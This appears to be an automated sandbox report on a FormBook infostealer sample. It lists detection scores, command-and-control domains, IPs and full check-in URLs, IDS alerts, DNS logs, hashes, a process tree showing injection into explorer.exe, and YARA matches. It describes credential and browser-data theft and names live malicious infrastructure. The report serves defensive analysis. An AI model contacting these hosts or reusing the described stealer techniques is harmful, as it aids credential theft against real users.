          • explorer.exe (injected): www.afterdarksocial.club 162.214.129.149, ports 49711, 49712, 80, UNIFIEDLAYER-AS-1US United States; eufidelizo.com 192.185.217.47, ports 49707, 80, UNIFIEDLAYER-AS-1US United States; 4 other IPs or domains. System process connects to network (likely due to code injection or exploit); Uses netsh to modify the Windows network and firewall settings; starts netsh.exe and autochk.exe.
          • netsh.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process.

          Source | Detection | Scanner | Label
          qHpeBvr9cR.exe | 41% | ReversingLabs | Win32.Trojan.Garf
          qHpeBvr9cR.exe | 37% | Virustotal |
          qHpeBvr9cR.exe | 100% | Joe Sandbox ML |

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\febcldoukq.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Temp\febcldoukq.exe | 20% | ReversingLabs | Win32.Trojan.FormBook

          Source | Detection | Scanner | Label
          2.0.febcldoukq.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          2.2.febcldoukq.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          0.0.qHpeBvr9cR.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
          0.2.qHpeBvr9cR.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
          1.2.febcldoukq.exe.17b0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

          Source | Detection | Scanner | Label
          www.patrickguarte.com | 1% | Virustotal |
          eufidelizo.com | 9% | Virustotal |
          www.lyonfinancialusa.com | 0% | Virustotal |
          www.eufidelizo.com | 7% | Virustotal |

          Source | Detection | Scanner | Label
          http://www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X | 100% | Avira URL Cloud | malware
          http://www.patrickguarte.com/henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X | 100% | Avira URL Cloud | malware
          www.brennancorps.info/henz/ | 100% | Avira URL Cloud | malware
          http://www.patrickguarte.com/henz/ | 100% | Avira URL Cloud | malware
          http://www.lyonfinancialusa.com/henz/ | 100% | Avira URL Cloud | malware
          http://www.afterdarksocial.club/henz/ | 100% | Avira URL Cloud | malware
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.patrickguarte.com | 155.159.61.221 | true | true | | unknown
          eufidelizo.com | 192.185.217.47 | true | true | | unknown
          www.lyonfinancialusa.com | 206.233.197.135 | true | true | | unknown
          www.afterdarksocial.club | 162.214.129.149 | true | true | | unknown
          www.eufidelizo.com | unknown | unknown | true | | unknown
          www.19t221013d.tokyo | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          http://www.lyonfinancialusa.com/henz/ | true | Avira URL Cloud: malware | unknown
          http://www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X | true | Avira URL Cloud: malware | unknown
          http://www.patrickguarte.com/henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X | true | Avira URL Cloud: malware | unknown
          http://www.patrickguarte.com/henz/ | true | Avira URL Cloud: malware | unknown
          http://www.afterdarksocial.club/henz/ | true | Avira URL Cloud: malware | unknown
          www.brennancorps.info/henz/ | true | Avira URL Cloud: malware | low
IP | Domain | Country | ASN | ASN Name | Malicious
192.185.217.47 | eufidelizo.com | United States | 46606 | UNIFIEDLAYER-AS-1 (US) | true
206.233.197.135 | www.lyonfinancialusa.com | United States | 174 | COGENT-174 (US) | true
155.159.61.221 | www.patrickguarte.com | South Africa | 137951 | CLAYERLIMITED-AS-AP Clayer Limited (HK) | true
162.214.129.149 | www.afterdarksocial.club | United States | 46606 | UNIFIEDLAYER-AS-1 (US) | true
                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                            Analysis ID:756313
                                            Start date and time:2022-11-30 01:08:08 +01:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 18s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:qHpeBvr9cR.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:9
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@7/5@7/4
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 76.9% (good quality ratio 67.7%)
                                            • Quality average: 68.7%
                                            • Quality standard deviation: 34.9%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.211.4.90
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            No simulations
                                            No context
                                            Process:C:\Windows\SysWOW64\netsh.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                            Category:dropped
                                            Size (bytes):94208
                                            Entropy (8bit):1.287139506398081
                                            Encrypted:false
                                            SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                            MD5:292F98D765C8712910776C89ADDE2311
                                            SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                            SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                            SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Process:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):147968
                                            Entropy (8bit):6.182768531900874
                                            Encrypted:false
                                            SSDEEP:3072:ZOPPLcLPR2kaQ+nYwZbBPUxRC/akBYcgVg7JkWmjwaY4YFOnJSwy:ZiLcLPRi/xB8gFLm8oJSd
                                            MD5:96E050F99502FE7C52FD9B0F10202578
                                            SHA1:9ACE01D602E21FF8BF364A3BB2F46BC7FD285A7B
                                            SHA-256:C7207F58E7A5BAD6EFC38C7DDFDDBC3B32C28F6BBA01D4251A44F6BBDABE4BC3
                                            SHA-512:E09EDF0C05667FD2B684AD48F6938A0FB41C9B346197D5065FE828093789140B1A1F79279D8504428C9BA0B8049FAD9D7242015C43B746C854688AA883898E1E
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 20%
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):347987
                                            Entropy (8bit):7.481309990466636
                                            Encrypted:false
                                            SSDEEP:6144:RucNUhVyZTV2GQFRx0+EzyfkKisTiLcLPRi/xB8gFLm8oJSd:32jyZTgGL3cimiLcLPsPDC8n
                                            MD5:3D3DFD7BB3B31CA9F6A9085FF03A933F
                                            SHA1:C445CD44742166B12BC976C54EB0422E7B377C73
                                            SHA-256:74B5FDE9425C99AEB58669440FEE9206A57CAA8790635253E7F5C215973F4FB5
                                            SHA-512:202322D77C9697C31197F059DEF5879089D15CFCAA5BAA34C9603487ACC73F9E6D3EE5CD693B9523A57A24176604D588F0DFFA1A2C8E6229BCCE345485194BA8
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):189440
                                            Entropy (8bit):7.9986039311688
                                            Encrypted:true
                                            SSDEEP:3072:8fFUilhKe4N7QY77ozZs4cwNwnj9XGKjbMVcRx0+DBhaQmmmXzbwaf6f03uftUZj:8NUhVyZTV2GQFRx0+EzyfkKisy
                                            MD5:9929DD1C8831360C68C176ADB59CA947
                                            SHA1:6CB9F8D296878B31DB696038EA01470613AEED9F
                                            SHA-256:5F3B667FA88AAD6BA21374E37014E72C2AAD0317ED1DE2C1D6DE839A61F9F541
                                            SHA-512:390D7426188347A9F64D9EEA2A9B89807443BBDAC1409DB20532CD504A56637005B75B8FE23D29E5F8187D9D1DEB238B10FE8734ED504C13AE9E5478667F0E9C
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):5837
                                            Entropy (8bit):6.204282040759092
                                            Encrypted:false
                                            SSDEEP:96:FMlgVSPVGToJyq52wK33eDdEA2GVnb3+EFxIhP/mny+lDMv4h3UboO:7StrNtK3eBEAHb37PnN3/O
                                            MD5:28373E2B7E834278BBFC8597EA79A659
                                            SHA1:674506B6D8C29D724529B2154D2EDCABEC4DB4EB
                                            SHA-256:C8BD6B365CE4C504FD875CC967B7B498E8D79A27E877DBF1B3128EAD638C1B57
                                            SHA-512:4B1CB1CFE3DB15617511826351738010044DB5742E2BE522D3661D36AA532EF52CD59776A211C51BC58F118CF64B126ADC0296D537ACEECE7E66E7D6D7034BDE
                                            Malicious:false
                                            Reputation:low
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.9356650255872205
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:qHpeBvr9cR.exe
                                            File size:285325
                                            MD5:f5bea76ffac05afbe19274595801184e
                                            SHA1:93ef457bfcbc5f0860b1b7f6353ed6e9b0afd60e
                                            SHA256:40dcfb704112265b383679baa3064cd7355bd02119b117f396e1b0283342362c
                                            SHA512:3e1537258907bc3707c5cd0a54b4b5d35516e1ccb2443dfcfb493ecd931a734acf85bf2fb9aede36893b7dd12ee71baac7df48506117aee972bdab68e6a08ab3
                                            SSDEEP:6144:QBn1RomeugRHbNAtHRgt/GVl9tSvOBFRQecwcwHa:gavFRy5Ot/OceFRbfHa
                                            TLSH:2554233734CA95BBD8674633C8B3A1E6D37FE2034422115B1BD50F66B6987C3C26299B
                                            Icon Hash:b2a88c96b2ca6a72
                                            Entrypoint:0x40324f
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:ab6770b0a8635b9d92a5838920cfe770
                                            Instruction
                                            sub esp, 00000180h
                                            push ebx
                                            push ebp
                                            push esi
                                            push edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+1Ch], ebx
                                            mov dword ptr [esp+14h], 00409130h
                                            xor esi, esi
                                            mov byte ptr [esp+18h], 00000020h
                                            call dword ptr [004070B8h]
                                            call dword ptr [004070B4h]
                                            cmp ax, 00000006h
                                            je 00007F445C64C0C3h
                                            push ebx
                                            call 00007F445C64EEB1h
                                            cmp eax, ebx
                                            je 00007F445C64C0B9h
                                            push 00000C00h
                                            call eax
                                            push 004091E0h
                                            call 00007F445C64EE32h
                                            push 004091D8h
                                            call 00007F445C64EE28h
                                            push 004091CCh
                                            call 00007F445C64EE1Eh
                                            push 0000000Dh
                                            call 00007F445C64EE81h
                                            push 0000000Bh
                                            call 00007F445C64EE7Ah
                                            mov dword ptr [00423F84h], eax
                                            call dword ptr [00407034h]
                                            push ebx
                                            call dword ptr [00407270h]
                                            mov dword ptr [00424038h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 00000160h
                                            push eax
                                            push ebx
                                            push 0041F538h
                                            call dword ptr [00407160h]
                                            push 004091C0h
                                            push 00423780h
                                            call 00007F445C64EAB1h
                                            call dword ptr [004070B0h]
                                            mov ebp, 0042A000h
                                            push eax
                                            push ebp
                                            call 00007F445C64EA9Fh
                                            push ebx
                                            call dword ptr [00407144h]
                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73cc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0x9e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5c4a | 0x5e00 | False | 0.659906914893617 | data | 6.410763775060762 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x115e | 0x1200 | False | 0.4466145833333333 | data | 5.142548180775325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1b078 | 0x600 | False | 0.455078125 | data | 4.2252195571372315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2d000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.509328731926377 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2d190 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States
RT_DIALOG | 0x2d478 | 0x100 | data | English | United States
RT_DIALOG | 0x2d578 | 0x11c | data | English | United States
RT_DIALOG | 0x2d698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2d6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2d710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines (716), with no line terminators | English | United States
DLL | Imports
KERNEL32.dll | SetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
USER32.dll | GetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/30/22-01:10:42.253815 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49710 | 80 | 192.168.2.5 | 206.233.197.135
11/30/22-01:10:50.366888 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49712 | 80 | 192.168.2.5 | 162.214.129.149
11/30/22-01:10:42.253815 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49710 | 80 | 192.168.2.5 | 206.233.197.135
11/30/22-01:10:50.366888 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49712 | 80 | 192.168.2.5 | 162.214.129.149
11/30/22-01:10:42.253815 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49710 | 80 | 192.168.2.5 | 206.233.197.135
11/30/22-01:10:50.366888 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49712 | 80 | 192.168.2.5 | 162.214.129.149
                                            Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                            Nov 30, 2022 01:11:07.119535923 CET | 192.168.2.5 | 8.8.8.8 | cff9 | (Port unreachable) | Destination Unreachable
                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                            Nov 30, 2022 01:10:28.856163025 CET | 192.168.2.5 | 8.8.8.8 | 0xdc74 | Standard query (0) | www.eufidelizo.com | A (IP address) | IN (0x0001) | false
                                            Nov 30, 2022 01:10:39.525219917 CET | 192.168.2.5 | 8.8.8.8 | 0xccc6 | Standard query (0) | www.lyonfinancialusa.com | A (IP address) | IN (0x0001) | false
                                            Nov 30, 2022 01:10:47.853636980 CET | 192.168.2.5 | 8.8.8.8 | 0x22da | Standard query (0) | www.afterdarksocial.club | A (IP address) | IN (0x0001) | false
                                            Nov 30, 2022 01:10:55.547888041 CET | 192.168.2.5 | 8.8.8.8 | 0x18f9 | Standard query (0) | www.patrickguarte.com | A (IP address) | IN (0x0001) | false
                                            Nov 30, 2022 01:11:03.553632021 CET | 192.168.2.5 | 8.8.8.8 | 0x4db1 | Standard query (0) | www.19t221013d.tokyo | A (IP address) | IN (0x0001) | false
                                            Nov 30, 2022 01:11:05.325809002 CET | 192.168.2.5 | 8.8.8.8 | 0xf47d | Standard query (0) | www.19t221013d.tokyo | A (IP address) | IN (0x0001) | false
                                            Nov 30, 2022 01:11:06.344841003 CET | 192.168.2.5 | 8.8.8.8 | 0xf47d | Standard query (0) | www.19t221013d.tokyo | A (IP address) | IN (0x0001) | false
                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                            Nov 30, 2022 01:10:29.011351109 CET | 8.8.8.8 | 192.168.2.5 | 0xdc74 | No error (0) | www.eufidelizo.com | eufidelizo.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                            Nov 30, 2022 01:10:29.011351109 CET | 8.8.8.8 | 192.168.2.5 | 0xdc74 | No error (0) | eufidelizo.com |  | 192.185.217.47 | A (IP address) | IN (0x0001) | false
                                            Nov 30, 2022 01:10:39.704725981 CET | 8.8.8.8 | 192.168.2.5 | 0xccc6 | No error (0) | www.lyonfinancialusa.com |  | 206.233.197.135 | A (IP address) | IN (0x0001) | false
                                            Nov 30, 2022 01:10:48.007566929 CET | 8.8.8.8 | 192.168.2.5 | 0x22da | No error (0) | www.afterdarksocial.club |  | 162.214.129.149 | A (IP address) | IN (0x0001) | false
                                            Nov 30, 2022 01:10:55.726146936 CET | 8.8.8.8 | 192.168.2.5 | 0x18f9 | No error (0) | www.patrickguarte.com |  | 155.159.61.221 | A (IP address) | IN (0x0001) | false
                                            Nov 30, 2022 01:11:04.318644047 CET | 8.8.8.8 | 192.168.2.5 | 0x4db1 | Server failure (2) | www.19t221013d.tokyo | none | none | A (IP address) | IN (0x0001) | false
                                            Nov 30, 2022 01:11:06.350476027 CET | 8.8.8.8 | 192.168.2.5 | 0xf47d | Server failure (2) | www.19t221013d.tokyo | none | none | A (IP address) | IN (0x0001) | false
                                            Nov 30, 2022 01:11:07.118748903 CET | 8.8.8.8 | 192.168.2.5 | 0xf47d | Server failure (2) | www.19t221013d.tokyo | none | none | A (IP address) | IN (0x0001) | false
                                            • www.eufidelizo.com
                                            • www.lyonfinancialusa.com
                                            • www.afterdarksocial.club
                                            • www.patrickguarte.com


                                            Target ID:0
                                            Start time:01:09:00
                                            Start date:30/11/2022
                                            Path:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            Imagebase:0x400000
                                            File size:285325 bytes
                                            MD5 hash:F5BEA76FFAC05AFBE19274595801184E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low

                                            Target ID:1
                                            Start time:01:09:00
                                            Start date:30/11/2022
                                            Path:C:\Users\user\AppData\Local\Temp\febcldoukq.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
                                            Imagebase:0xb10000
                                            File size:147968 bytes
                                            MD5 hash:96E050F99502FE7C52FD9B0F10202578
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 20%, ReversingLabs
                                            Reputation:low

                                            Target ID:2
                                            Start time:01:09:00
                                            Start date:30/11/2022
                                            Path:C:\Users\user\AppData\Local\Temp\febcldoukq.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
                                            Imagebase:0xb10000
                                            File size:147968 bytes
                                            MD5 hash:96E050F99502FE7C52FD9B0F10202578
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Target ID:3
                                            Start time:01:09:06
                                            Start date:30/11/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff69bc80000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
